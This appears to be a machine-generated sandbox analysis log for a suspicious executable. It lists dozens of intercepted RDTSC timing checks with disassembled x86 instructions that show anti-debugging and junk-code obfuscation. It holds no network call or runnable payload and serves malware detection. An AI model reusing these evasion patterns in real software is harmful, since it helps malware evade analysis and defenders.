Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30478 second address: 4D3049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7F642A8Ah 0x00000008 mov dx, 6556h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi], edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F77012B90EFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3049C second address: 4D304A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D304A0 second address: 4D304A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D304A6 second address: 4D304B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22BBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D304B5 second address: 4D304B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D304B9 second address: 4D304F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx esi, dx 0x00000011 pushfd 0x00000012 jmp 00007F77004F22C3h 0x00000017 jmp 00007F77004F22C3h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D304F3 second address: 4D30522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F77012B90EDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30522 second address: 4D30595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F77004F22BEh 0x00000011 mov eax, dword ptr [ebx+4Ch] 0x00000014 jmp 00007F77004F22C0h 0x00000019 mov dword ptr [esi+10h], eax 0x0000001c jmp 00007F77004F22C0h 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 pushad 0x00000025 jmp 00007F77004F22BEh 0x0000002a popad 0x0000002b mov dword ptr [esi+14h], eax 0x0000002e pushad 0x0000002f call 00007F77004F22BDh 0x00000034 pop edi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30595 second address: 4D305FB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77012B90F9h 0x00000008 sub esi, 09DEB056h 0x0000000e jmp 00007F77012B90F1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [ebx+54h] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F77012B90ECh 0x00000021 add ax, 8A78h 0x00000026 jmp 00007F77012B90EBh 0x0000002b popfd 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 mov dword ptr [esi+18h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D305FB second address: 4D30617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30617 second address: 4D3063D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77012B90F0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3063D second address: 4D30643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30643 second address: 4D30694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+1Ch], eax 0x0000000c pushad 0x0000000d mov ax, bx 0x00000010 popad 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 pushad 0x00000015 mov dx, 52BAh 0x00000019 push ebx 0x0000001a pushfd 0x0000001b jmp 00007F77012B90EEh 0x00000020 and al, FFFFFFF8h 0x00000023 jmp 00007F77012B90EBh 0x00000028 popfd 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esi+20h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F77012B90F2h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30694 second address: 4D3069C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3069C second address: 4D306CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+60h] 0x0000000a pushad 0x0000000b mov edx, 074C497Ah 0x00000010 call 00007F77012B90EBh 0x00000015 movzx eax, di 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov dword ptr [esi+24h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F77012B90EAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D306CD second address: 4D306D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D306D1 second address: 4D306D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D306D7 second address: 4D30729 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d call 00007F77004F22BEh 0x00000012 mov ecx, 4229E8E1h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F77004F22BDh 0x00000020 sbb ecx, 1726DCB6h 0x00000026 jmp 00007F77004F22C1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30729 second address: 4D307D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77012B90F0h 0x00000008 and eax, 63B837D8h 0x0000000e jmp 00007F77012B90EBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi+28h], eax 0x0000001a jmp 00007F77012B90F6h 0x0000001f mov eax, dword ptr [ebx+68h] 0x00000022 pushad 0x00000023 call 00007F77012B90EEh 0x00000028 movzx ecx, di 0x0000002b pop edi 0x0000002c pushfd 0x0000002d jmp 00007F77012B90ECh 0x00000032 sbb esi, 1BD57C98h 0x00000038 jmp 00007F77012B90EBh 0x0000003d popfd 0x0000003e popad 0x0000003f mov dword ptr [esi+2Ch], eax 0x00000042 pushad 0x00000043 mov al, dh 0x00000045 popad 0x00000046 mov ax, word ptr [ebx+6Ch] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx ebx, cx 0x00000050 pushfd 0x00000051 jmp 00007F77012B90F0h 0x00000056 jmp 00007F77012B90F5h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D307D9 second address: 4D3084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F77004F22BEh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F77004F22BDh 0x00000022 or ah, FFFFFFA6h 0x00000025 jmp 00007F77004F22C1h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F77004F22C0h 0x00000031 sub ah, 00000048h 0x00000034 jmp 00007F77004F22BBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3084E second address: 4D30854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30854 second address: 4D30858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30858 second address: 4D3088D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+32h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 669C6A66h 0x00000017 jmp 00007F77012B90F7h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3088D second address: 4D308BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F77004F22BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D308BF second address: 4D308F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F77012B90F8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D308F3 second address: 4D308F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D308F9 second address: 4D30918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F77012B90EDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30918 second address: 4D3091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3091C second address: 4D30922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30922 second address: 4D30928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30928 second address: 4D3092C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D3092C second address: 4D309B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F77004F22BEh 0x00000015 adc si, 25E8h 0x0000001a jmp 00007F77004F22BBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F77004F22C8h 0x00000026 and ax, B848h 0x0000002b jmp 00007F77004F22BBh 0x00000030 popfd 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+1Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F77004F22C5h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D309B1 second address: 4D309C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D309C1 second address: 4D30A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F77004F22C2h 0x00000017 jmp 00007F77004F22C5h 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A01 second address: 4D30A2F instructions: 0x00000000 rdtsc 0x00000002 mov ch, ECh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77012B90EDh 0x0000000b popad 0x0000000c mov eax, dword ptr [ebx+20h] 0x0000000f jmp 00007F77012B90EEh 0x00000014 mov dword ptr [esi+40h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A2F second address: 4D30A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A33 second address: 4D30A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A39 second address: 4D30A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A3F second address: 4D30A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A43 second address: 4D30A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A47 second address: 4D30A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F77012B90EFh 0x00000017 sbb si, 40BEh 0x0000001c jmp 00007F77012B90F9h 0x00000021 popfd 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A8A second address: 4D30A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30A90 second address: 4D30AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F77012B90EAh 0x00000016 jmp 00007F77012B90F5h 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30AD5 second address: 4D30B7F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F77004F22C0h 0x00000008 sub ax, D678h 0x0000000d jmp 00007F77004F22BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F77004F22C8h 0x0000001b sbb cl, FFFFFFD8h 0x0000001e jmp 00007F77004F22BBh 0x00000023 popfd 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007F77004F22C6h 0x0000002b push eax 0x0000002c pushad 0x0000002d movsx ebx, ax 0x00000030 push esi 0x00000031 pushfd 0x00000032 jmp 00007F77004F22C9h 0x00000037 jmp 00007F77004F22BBh 0x0000003c popfd 0x0000003d pop eax 0x0000003e popad 0x0000003f nop 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F77004F22C1h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30B7F second address: 4D30B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30B83 second address: 4D30B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30B89 second address: 4D30BB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F77012B90F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30BB5 second address: 4D30C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007F77004F22C5h 0x00000017 sub cl, FFFFFFA6h 0x0000001a jmp 00007F77004F22C1h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F77004F22BDh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30C04 second address: 4D30C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30C0A second address: 4D30C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30C9E second address: 4D30CD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 5874h 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d js 00007F7773747AFEh 0x00000013 jmp 00007F77012B90EFh 0x00000018 mov eax, dword ptr [ebp-0Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ebx, 4EA5D0E6h 0x00000023 mov edx, 0B6E1572h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30CD1 second address: 4D30CE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30CE4 second address: 4D30DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f call 00007F77012B90ECh 0x00000014 pushfd 0x00000015 jmp 00007F77012B90F2h 0x0000001a sub cx, 9218h 0x0000001f jmp 00007F77012B90EBh 0x00000024 popfd 0x00000025 pop eax 0x00000026 mov ecx, edi 0x00000028 popad 0x00000029 lea eax, dword ptr [ebx+78h] 0x0000002c pushad 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 push 00000001h 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F77012B90F5h 0x0000003a jmp 00007F77012B90EBh 0x0000003f popfd 0x00000040 mov ch, 4Ah 0x00000042 popad 0x00000043 push esi 0x00000044 jmp 00007F77012B90F0h 0x00000049 mov dword ptr [esp], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f mov bl, 6Eh 0x00000051 pushfd 0x00000052 jmp 00007F77012B90F6h 0x00000057 sbb eax, 11460868h 0x0000005d jmp 00007F77012B90EBh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30DAE second address: 4D30E02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 call 00007F77004F22BBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 pushad 0x00000012 push ebx 0x00000013 mov cx, B747h 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007F77004F22BDh 0x0000001e sbb cx, 3936h 0x00000023 jmp 00007F77004F22C1h 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F77004F22BDh 0x00000032 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30E02 second address: 4D30E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F77012B90F7h 0x00000011 adc cx, A3CEh 0x00000016 jmp 00007F77012B90F9h 0x0000001b popfd 0x0000001c mov cx, 01D7h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F77012B90F9h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30E71 second address: 4D30E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30EA1 second address: 4D30ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F77012B90EAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30ECB second address: 4D30ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30ECF second address: 4D30ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30ED5 second address: 4D30FC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test edi, edi 0x0000000c pushad 0x0000000d call 00007F77004F22C2h 0x00000012 pushfd 0x00000013 jmp 00007F77004F22C2h 0x00000018 sbb eax, 17A398F8h 0x0000001e jmp 00007F77004F22BBh 0x00000023 popfd 0x00000024 pop esi 0x00000025 mov bh, 8Ch 0x00000027 popad 0x00000028 js 00007F7772980A52h 0x0000002e pushad 0x0000002f call 00007F77004F22BEh 0x00000034 pushfd 0x00000035 jmp 00007F77004F22C2h 0x0000003a sbb cl, FFFFFF88h 0x0000003d jmp 00007F77004F22BBh 0x00000042 popfd 0x00000043 pop ecx 0x00000044 pushfd 0x00000045 jmp 00007F77004F22C9h 0x0000004a xor esi, 7D44E9A6h 0x00000050 jmp 00007F77004F22C1h 0x00000055 popfd 0x00000056 popad 0x00000057 mov eax, dword ptr [ebp-04h] 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov cx, bx 0x00000060 pushfd 0x00000061 jmp 00007F77004F22BFh 0x00000066 sub si, 9CDEh 0x0000006b jmp 00007F77004F22C9h 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D30FC1 second address: 4D31010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F77012B90F3h 0x00000015 or ch, FFFFFF9Eh 0x00000018 jmp 00007F77012B90F9h 0x0000001d popfd 0x0000001e push ecx 0x0000001f pop ebx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31010 second address: 4D31053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c jmp 00007F77004F22BEh 0x00000011 push 00000001h 0x00000013 jmp 00007F77004F22C0h 0x00000018 nop 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F77004F22BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31053 second address: 4D31062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 4D31062 second address: 4D31097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F77004F22C3h 0x00000013 rdtsc
